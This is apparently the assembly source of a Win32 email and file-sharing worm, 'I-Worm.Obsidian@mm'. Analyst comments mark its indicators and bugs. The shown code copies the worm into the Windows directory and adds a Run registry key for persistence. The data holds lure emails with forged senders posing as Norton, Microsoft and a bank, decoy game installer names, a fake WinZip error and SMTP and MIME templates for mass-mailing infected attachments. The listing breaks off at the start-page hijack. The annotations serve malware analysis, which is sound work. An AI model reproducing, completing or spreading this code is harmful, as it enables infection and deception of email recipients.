;---------------------------------------------------------------------------;
; Name: I-Worm.Obsidian@mm ;
; Author: Vorgon ;
; Size: 12288 Bytes ; ;
; ;
; Made in Canada ;
;---------------------------------------------------------------------------;
; ;
; DESCRIPTION: ;
; ;
; This is my first worm. It spreads using file sharing and email. When the ;
; worm is executed it copies itself to the c:\windows directory. It then ;
; adds itself to the registry so it runs on start-up. The internet explorer ;
; start page is then changed to www.dxgaming.com. A game is then created in ;
; the c:\my downloads directory if one does not already exist. The game to ;
; be created is based on the hour giving a possible 24 games. If the worm ;
; is executed on start-up then it stays active. Every hour it will send ;
; infected emails to everyone in the windows address book. A different ;
; email is sent for every day of the week using my own SMTP engine. ;
; ; ;
; ASSEMBLING: ;
; ;
; tasm32 /ml obsidian ;
; tlink32 -aa -x /Tpe /c obsidian,obsidian,, import32.lib,, ;
; ;
; GREETZ: ;
; ;
; T00FiC, Eddow, Asmodeus, SPTH, PakBrain, Kefi, urgo32 ; ;
; ;
;---------------------------------------------------------------------------;
; Target/ABI: 32-bit flat model, stdcall, built as a Win32 PE with TASM/TLINK
; (see the build lines in the header). The `call Proc, arg, ...` form used
; throughout is TASM's extended CALL syntax: the listed arguments are pushed
; right-to-left before the call.
.386p
.MODEL flat, stdcall
extrn MessageBoxA : PROC
extrn GetCommandLineA : PROC
extrn CreateFileA : PROC
extrn ReadFile : PROC
extrn WriteFile : PROC
extrn SetFilePointer : PROC
extrn CloseHandle : PROC
extrn SetCurrentDirectoryA : PROC
extrn GetWindowsDirectoryA : PROC
extrn ExitProcess : PROC
extrn RegOpenKeyA : PROC
extrn RegSetValueExA : PROC
extrn RegQueryValueExA : PROC
extrn RegCloseKey : PROC
extrn GetSystemTime : PROC
extrn FindFirstFileA : PROC
extrn FindNextFileA : PROC
extrn FindClose : PROC
extrn Sleep : PROC
extrn lstrcpyA : PROC
extrn lstrcatA : PROC
extrn lstrlenA : PROC
extrn WSAStartup : PROC
extrn WSACleanup : PROC
extrn socket : PROC
extrn closesocket : PROC
extrn htons : PROC
extrn gethostbyname : PROC
extrn connect : PROC
extrn recv : PROC
extrn send : PROC
extrn recvfrom : PROC
extrn sendto : PROC
extrn RtlZeroMemory : PROC
extrn setsockopt : PROC
extrn CopyFileA : PROC
extrn MAPISendMail : PROC
; --- Win32 file / registry constants (values as in the SDK) ---
OPEN_EXISTING equ 3
CREATE_NEW equ 1 ; CreateFileA fails if the target exists; used for the drop at copyFile
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
FILE_SHARE_READ equ 1
FILE_SHARE_WRITE equ 2
FILE_BEGIN equ 0
HKEY_LOCAL_MACHINE equ 80000002h ; root of the Run-key persistence write at addToReg
HKEY_CURRENT_USER equ 80000001h
REG_SZ equ 1
TRUE equ 1
FALSE equ 0
; --- Winsock constants ---
AF_INET equ 2
SOCK_STREAM equ 1 ; TCP (presumably the SMTP connection; socket code is outside this view)
SOCK_DGRAM equ 2 ; UDP (presumably the DNS queries; sendto/recvfrom are imported)
PCL_NONE equ 0 ; not referenced in the visible part of the file
; --- DNS wire-format record type/class values ---
DNS_TYPE_MX equ 15 ; mail-exchanger lookup, presumably for the recipient domains
DNS_TYPE_NS equ 2
DNS_CLASS_IN equ 1
; --- setsockopt: per-socket receive/send timeouts (SOL_SOCKET level) ---
SO_RCVTIMEO equ 1006h
SO_SNDTIMEO equ 1005h
SOL_SOCKET equ 0FFFFh
; Entry of softwareTable (the decoy "game" files). FileSize is presumably the
; byte length of the decoy created in c:\my downloads -- the creation code is
; outside this view.
SOFTWARE STRUC
FileName db 50 dup(0) ; decoy file name, NUL padded
FileSize dd 0
SOFTWARE ENDS
; Entry of emailTable: one message template. From is a hard-coded (forged)
; sender address; AttachmentName is the file name the copy is mailed as.
EMAIL STRUC
From db 50 dup(0)
Subject db 50 dup(0)
Message db 100 dup(0)
AttachmentName db 20 dup(0)
EMAIL ENDS
; Win32 SYSTEMTIME as filled by GetSystemTime. Per the header, the hour picks
; the decoy and the weekday picks the email template (selection code not visible here).
SYSTEMTIME STRUC
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0 ; 0 = Sunday in the Win32 definition
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMiliseconds dw 0
SYSTEMTIME ENDS
; Win32 WIN32_FIND_DATA for FindFirstFileA/FindNextFileA; field order and
; sizes follow the SDK layout (FILETIMEs are 8 bytes each).
WIN32_FIND_DATA STRUC
FileAttributes dd 0
CreateTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
FileSizeHigh dd 0
FileSizeLow dd 0
Reserved0 dd 0
Reserved1 dd 0
FullFileName db 260 dup(0) ; MAX_PATH
AlternateFileName db 14 dup(0) ; 8.3 name
WIN32_FIND_DATA ENDS
; Winsock WSADATA, filled by WSAStartup.
WSA_DATA STRUC
wVersion dw 0
wHighVersion dw 0
szDescription db 257 dup(0)
szSystemStatus db 129 dup(0)
iMaxSockets dw 0
iMaxUdpDg dw 0
lpVendorInfo dd 0
WSA_DATA ENDS
; sockaddr_in. sin_port is stored in network byte order (htons is imported).
SOCK_ADDRESS STRUC
sin_family dw 0
sin_port dw 0
sin_addr dd 0
sin_zero db 8 dup(0)
SOCK_ADDRESS ENDS
.DATA
; Fake WinZip error shown to the user as cover (MessageBoxA is imported above;
; the call itself is outside this view).
szErrorTitle db 'WinZip Self-Extractor', 0
szErrorMessage db 'WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error', 0
; --- Host indicators: dropped file, registry keys and directories touched ---
szMaster db 'pcconfig.exe', 0 ; dropped copy, placed in the Windows directory (copyFile)
szStartPageKey db 'Software\Microsoft\Internet Explorer\Main', 0 ; IE start-page hijack target
szStartPageName db 'Start Page', 0
szStartPageValue db 'http://www.dxgaming.com', 0 ; new start page
szStartUpKey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0 ; persistence key, opened under HKLM (addToReg)
szStartUpName db 'PC-Config32', 0 ; Run value name
szParamterA db ' -A', 0 ; appended to the Run command line; per the header -A marks a start-up launch
szWabKey db 'Software\Microsoft\WAB\WAB4\Wab File Name', 0 ; locates the Windows Address Book used as the recipient source
szMyDownloads db 'c:\my downloads', 0 ; directory the decoy is written to
szSearchString db 'c:\my downloads\*.exe', 0 ; FindFirstFileA pattern, presumably to test whether a decoy already exists
hFile dd 0
hKey dd 0
hFindFile dd 0
hSock dd 0
parameterA db FALSE ; set at Main (see the note there)
recordPosition dd 0
dataType dd 0
bufferSize dd 256 ; presumably the in/out size for RegQueryValueExA into szWabValue (256 bytes) -- caller not visible
numberOfEmails dd 0
pointerToEmails dd 0
numberOfBytes dd 0
; --- SMTP engine verbs (network indicators). helo, sendData, dot and endMail
; carry no terminating 0, so they are presumably sent with fixed lengths.
helo db 'HELO vorgon.com', 13, 10 ; fixed HELO name, distinctive on the wire
szMailFrom db 'MAIL FROM: <', 0
szMailTo db 'RCPT TO: <', 0
sendData db 'DATA', 13, 10
dot db 13, 10, '.', 13, 10 ; end-of-message marker
endMail db 'QUIT', 13, 10
sendBuffer db 100 dup(0)
szBracket db '>', 13, 10, 0
szCrLf db 13, 10, 0
; Hard-coded external DNS resolvers; presumably queried directly over UDP
; (sendto/recvfrom are imported). Client traffic to these addresses is a
; network indicator.
szDnsName db '168.95.1.1', 0
szFile db 'results.bin', 0 ; not referenced in the visible part of the file
szDnsx db '61.222.188.150',0
IOTimeOut dd 0
bytes4 dd 0
; template for an email message with file attachment: MIME multipart with a
; base64-encoded executable part. The fixed boundary "boundarystring" and the
; name="default.exe" part header are static, filterable artefacts.
emailP1 db 'MIME-Version: 1.0', 13, 10
db 'From: <', 0
emailP2 db '>', 13, 10
db 'To: <', 0
emailP3 db '>', 13, 10
db 'Subject: ', 0
emailP4 db 13, 10
db 'Content-Type: multipart/mixed; boundary=boundarystring', 13, 10, 13, 10
db 'This is a mulipart message in MIME format.', 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: text/plain', 13, 10, 13, 10, 0
emailP5 db 13, 10
db '--boundarystring', 13, 10
db 'Content-Type: application; name="default.exe"', 13, 10
db 'Content-Transfer-Encoding: base64', 13, 10
db 'Content-Disposition: attachment; filename="', 0
emailP6 db '"', 13, 10, 13, 10, 0
emailP7 db 13, 10, '--boundarystring--', 13, 10, 0
; 24 decoy names, one per hour (header: "based on the hour giving a possible
; 24 games"). The names mimic full-version game installers, which is the
; file-sharing lure described in the header; the decoy is written under
; c:\my downloads. Any of these file names is a host indicator. Note the
; Lord of the Rings and Medal of Honor entries carry the same FileSize value.
SOFTWARE <"Cossacks Full Version.exe", 0A87EC13h>
SOFTWARE <"Battlefield 1942 (full).exe", 0C499913h>
SOFTWARE <"Warcraft III Full.exe", 09994613h>
SOFTWARE <"Jedi Knight II.exe", 0A706C13h>
SOFTWARE <"Quake 3 Full Version.exe", 099C7A13h>
SOFTWARE <"Starcraft full.exe", 07C83013h>
SOFTWARE <"Doom 3.exe", 13D58313h>
SOFTWARE <"Tribes 2 (full).exe", 104C3513h>
SOFTWARE <"Rainbow 6 Full.exe", 07B8ED13h>
SOFTWARE <"Oni full.exe", 0A66A813h>
SOFTWARE <"White and Black.exe", 0999BB13h>
SOFTWARE <"Return to Castle Wolfenstien (Full).exe", 277C5613h>
SOFTWARE <"Command & Conquer: Generals.exe", 28F8BD13h>
SOFTWARE <"Black Hawk Down (full).exe", 048E1313h>
SOFTWARE <"The Sims: Unleashed.exe", 0A168C13h>
SOFTWARE <"Age Of Mythology.exe", 165D8E13h>
SOFTWARE <"Dark Age of Camelot.exe", 19775113h>
SOFTWARE <"Ultima Online.exe", 1F316113h>
SOFTWARE <"The Lord of the Rings.exe", 0C147F13h>
SOFTWARE <"Medel Of Honor: Allied Assault.exe", 0C147F13h>
SOFTWARE <"Grand Theft Auto 3 (full).exe", 08E07D13h>
SOFTWARE <"Unreal 2: The Awakening (full).exe", 16A71A13h>
SOFTWARE <"Unreal.exe", 0ABA1F13h>
SOFTWARE <"Master Of Orion 3.exe", 03046613h>
; Seven message templates, one per weekday per the header (presumably indexed
; by SYSTEMTIME.wDayOfWeek; the selection code is outside this view).
; Sender addresses are hard-coded and forged; subjects, bodies and attachment
; names are static and usable as mail-gateway indicators.
; 0: "fun game" lure
EMAIL <"alex_p@hotmail.com",\
"So much fun",\
"This game really rocks. Play it!",\
"roadrash.exe">
; 1: "help me" lure
EMAIL <"nicolas_k@kingsnake.com",\
"I need help",\
"This game wont run properly. Does it work for you?",\
"kungfoo2.exe">
; 2: poses as an anti-virus vendor alert
EMAIL <"james_c@norton.com",\
"Virus Alert!",\
"Win32.Kiss0Death is spreading fast. Download the protection.",\
"protect.exe">
; 3: "recipe" lure
EMAIL <"joice_z@cooking.com",\
"Taisty eh?",\
"Tell me if this makes your mouth water.",\
"yummy.exe">
; 4: poses as a bank, "free money" lure
EMAIL <"momoney@cibc.com",\
"Free money",\
"Run this program and you will recieve 10 dollars a week free.",\
"money.exe">
; 5: poses as a vendor software update
EMAIL <"msn@microsoft.com",\
"MSN Messenger Update",\
"Latest update for MSN Messenger.",\
"messenger.exe">
; 6: poses as an anti-spam tool
EMAIL <"stopspam@spammers.com",\
"SPAM protection",\
"Run the program below and you will never see spam mail again.",\
"nospam.exe">
.DATA?
; Uninitialised storage (zero-filled by the loader). Items are laid out in
; declaration order.
buffer db 12288 dup(?) ; holds the running image; copyFile reads and writes 16384 bytes here (see the note there)
emailMessage db 4096 dup(?) ; assembled message; immediately follows buffer
dnsBuffer db 1000 dup(?)
szQuery db 100 dup(?)
szQuery2 db 100 dup(?)
szQueryLabels db 100 dup(?)
szSMTP db 100 dup(?)
emailAddressUNI db 68 dup(?) ; twice the size of emailAddressASC -- looks like a UTF-16 address read from the WAB file, converted to ASCII below; conversion code outside this view
emailAddressASC db 34 dup(?)
szWabValue db 256 dup(?) ; presumably the WAB file path read from szWabKey
szFullMaster db 256 dup(?) ; "<windir>\pcconfig.exe", later with " -A" appended for the Run value
time SYSTEMTIME ?
win32_find_data WIN32_FIND_DATA ?
WSAData WSA_DATA ?
SockAddress SOCK_ADDRESS ?
.CODE
Main:
;----------------------------------------------------------------------------
; Search the command line for -A
;----------------------------------------------------------------------------
; Entry point. Register roles: eax = pointer returned by GetCommandLineA,
; ecx = byte index scanned forward from 1. Assumes the command line has the
; form "<path>" -A with the opening quote at index 0; the scan has no length
; bound, so a command line without a second quote runs past the string.
; !!!!!! decrypt program in memory !!!!!! (author placeholder -- no
; decryption code is present at this point in the visible file)
call GetCommandLineA ; Get the command line
; search for a quote
mov ecx, 0
findParam:
inc ecx ; starts at index 1, i.e. skips the opening quote
cmp byte ptr [eax+ecx], 34 ; 34 = '"'
jne findParam
mov byte ptr [eax+ecx], 0 ; remove end quote (modifies the process command-line buffer in place)
inc eax ; skip past the first quote; eax now points at the bare path and is passed to CreateFileA at copyFile
mov parameterA, TRUE ; set unconditionally, before the compare below
cmp word ptr [eax+ecx+1], 'A-' ; -A ? looks at the two bytes after the closing quote and one separator byte ("-A" in memory order)
jne copyFile ; both outcomes land in copyFile, so parameterA is TRUE whether or not -A was given
;----------------------------------------------------------------------------
; Copy self to the windows directory as pcconfig.exe
;----------------------------------------------------------------------------
copyFile:
; Self-replication. eax still holds the path extracted at Main. Either
; CreateFileA returning -1 (INVALID_HANDLE_VALUE) jumps to addToReg, so an
; already existing pcconfig.exe is left as is (CREATE_NEW).
; open the current program file
call CreateFileA, eax, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; Read the program into memory
; call ReadFile, hFile, offset buffer, 12288, offset numberOfBytes, 0
; NOTE: buffer is declared as 12288 bytes in .DATA? but 16384 is requested
; here and written back below. A source file larger than 12288 bytes would
; spill into emailMessage, and the dropped copy is always 16384 bytes
; (buffer plus the 4096 bytes that follow it), i.e. its size differs from
; the 12288 stated in the header.
call ReadFile, hFile, offset buffer, 16384, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
; !!!!!!!!!!! encrypt the virus in the buffer !!!!!! (author placeholder -- no encryption code present here)
; create the path for pcconfig.exe
call GetWindowsDirectoryA, offset szFullMaster, 256 ; eax = length of the path written
mov byte ptr [szFullMaster+eax], '\' ; overwrites the terminator; the following byte is still 0 from the zero-filled section on first use
call lstrcatA, offset szFullMaster, offset szMaster ; szFullMaster = "<windir>\pcconfig.exe"
; create pcconfig.exe in the windows directory
call CreateFileA, offset szFullMaster, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je addToReg
; write the program in the buffer to the file
call WriteFile, hFile, offset buffer, 16384, offset numberOfBytes, 0 ; fixed 16384, not the byte count read above
; close file
call CloseHandle, hFile
;----------------------------------------------------------------------------
; Add pcconfig.exe to the registry so the program runs on start-up
;----------------------------------------------------------------------------
addToReg:
; Persistence via HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
; Indicator: value "PC-Config32" = "<windir>\pcconfig.exe -A". This label is
; also reached when opening the running file failed, in which case
; szFullMaster was never filled and the value written would be just " -A".
call lstrcpyA,offset szAttach, offset szFullMaster ; szAttach is not declared in the visible part of the file; presumably the attachment path for the mailer
; add -A to the path
call lstrcatA, offset szFullMaster, offset szParamterA
; open the key
call RegOpenKeyA, HKEY_LOCAL_MACHINE, offset szStartUpKey, offset hKey ; non-zero return (error) skips the write and leaves hKey untouched
cmp eax, 0
jne setStartPage ; target label is outside this view
; create a value
call RegSetValueExA, hKey, offset szStartUpName, 0, REG_SZ, offset szFullMaster, 128 ; cbData is a fixed 128, not the string length, so bytes past the terminator are stored too; the return value is not checked
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Change the internet explorer start page
;----------------------------------------------------------------------------